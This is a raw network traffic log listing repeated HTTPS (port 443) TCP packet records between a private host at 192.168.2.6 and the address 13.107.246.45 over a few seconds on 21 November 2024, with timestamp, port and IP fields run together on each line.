                                                                                                                                                                      Nov 21, 2024 06:25:09.264301062 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:09.264307022 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:09.702146053 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:09.702167988 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:09.702267885 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:09.702289104 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:09.702557087 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:09.702569962 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:09.702579021 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:09.702721119 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:09.702756882 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:09.702795029 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:09.705351114 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:09.705388069 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:09.705456972 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:09.705595970 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:09.705606937 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.524610043 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.525101900 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.525122881 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.525572062 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.525577068 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.528048038 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.528404951 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.528435946 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.528794050 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.528800011 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.817249060 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.817854881 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.817950964 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.818309069 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.818324089 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.850275993 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.850858927 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.850887060 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.851320982 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.851326942 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.965122938 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.965146065 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.965280056 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.965296030 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.965567112 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.965576887 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.965585947 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.965744019 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.965779066 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.965816021 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.968485117 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.968555927 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.968667984 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.968835115 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.968852997 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.972655058 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.972847939 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.972903967 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.972963095 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.972984076 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.973001003 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.973007917 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.975111961 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.975155115 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:10.975218058 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.975337029 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:10.975347996 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.270037889 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.270098925 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.270272017 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.270323038 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.270570040 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.270570040 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.270610094 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.270970106 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.271063089 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.271117926 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.273423910 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.273520947 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.273603916 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.273766994 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.273789883 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.302771091 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.302825928 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.302900076 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.302927017 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.303114891 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.303129911 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.303137064 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.303482056 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.303572893 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.303622961 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.305737019 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.305771112 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.305885077 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.306041002 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.306055069 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.555547953 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.556197882 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.556268930 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:11.556636095 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:11.556652069 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.029694080 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.029756069 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.029850006 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:12.029906988 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.032413960 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:12.032413960 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:12.032463074 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.032859087 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.032947063 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.033009052 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:12.035351992 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:12.035407066 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.035471916 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:12.035732031 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:12.035749912 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.747440100 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.747947931 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:12.748008966 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.748389006 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:12.748402119 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.763210058 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.763808966 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:12.763818979 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:12.764444113 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:12.764447927 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.059469938 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.060090065 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.060173988 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.060537100 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.060553074 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.154643059 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.155323982 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.155349970 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.155575037 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.155580997 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.191133976 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.191198111 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.191385984 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.191385984 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.191464901 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.191499949 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.194220066 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.194252968 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.194344997 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.194494963 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.194508076 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.205420017 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.205602884 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.205657959 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.205821037 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.205821037 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.205838919 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.205849886 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.207670927 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.207715988 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.207775116 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.207887888 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.207896948 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.501385927 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.501584053 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.501696110 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.501905918 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.501954079 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.501982927 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.502000093 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.504646063 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.504690886 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.504887104 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.505069971 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.505078077 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.605468988 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.609340906 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.609416962 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.609548092 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.609571934 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.609595060 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.609601974 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.612729073 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.612818003 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.612895966 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.613046885 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.613075972 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.755611897 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.758580923 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.758615971 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:13.759052038 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:13.759057999 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:14.272974014 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:14.273049116 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:14.273107052 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:14.273132086 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:14.273266077 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:14.273313046 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:14.273319006 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:14.273335934 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:14.273718119 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:14.273802042 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:14.273972988 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:14.276000977 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:14.276035070 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:14.276186943 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:14.276324987 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:14.276329994 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:14.998146057 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.038738966 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.039547920 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.082287073 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.245028019 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.245062113 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.245099068 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.245120049 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.245902061 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.245910883 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.245919943 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.245925903 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.299768925 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.300565958 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.300595045 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.301115036 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.301125050 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.394761086 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.395380974 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.395447016 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.396037102 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.396050930 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.601615906 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.601640940 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.601648092 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.601710081 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.601861954 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.601861954 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.601996899 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.602015972 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.602030993 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.602039099 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.604648113 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.604747057 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.606004953 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.606136084 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.606173038 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.618926048 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.619014978 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.619034052 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.619091034 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.619101048 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.619142056 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.619169950 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.619255066 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.619256020 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.619256020 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.743066072 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.743128061 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.743233919 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.743259907 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.746150970 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.747368097 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.747669935 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.747685909 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.747718096 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.747725964 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.750130892 CET50051443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.750160933 CET4435005113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.750251055 CET50051443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.750376940 CET50051443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.750387907 CET4435005113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.777982950 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.778084993 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.778101921 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.781987906 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.800750017 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.800780058 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.800795078 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.800803900 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.803818941 CET50052443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.803845882 CET4435005213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.803940058 CET50052443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.804060936 CET50052443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.804078102 CET4435005213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.884766102 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.884797096 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.884814978 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.884871960 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.884944916 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:15.884982109 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:15.885001898 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.069612980 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.069662094 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.069705009 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.069875002 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.070091963 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.070137024 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.070167065 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.070183039 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.073209047 CET50053443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.073261023 CET4435005313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:16.073358059 CET50053443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:16.073528051 CET50053443192.168.2.613.107.246.45
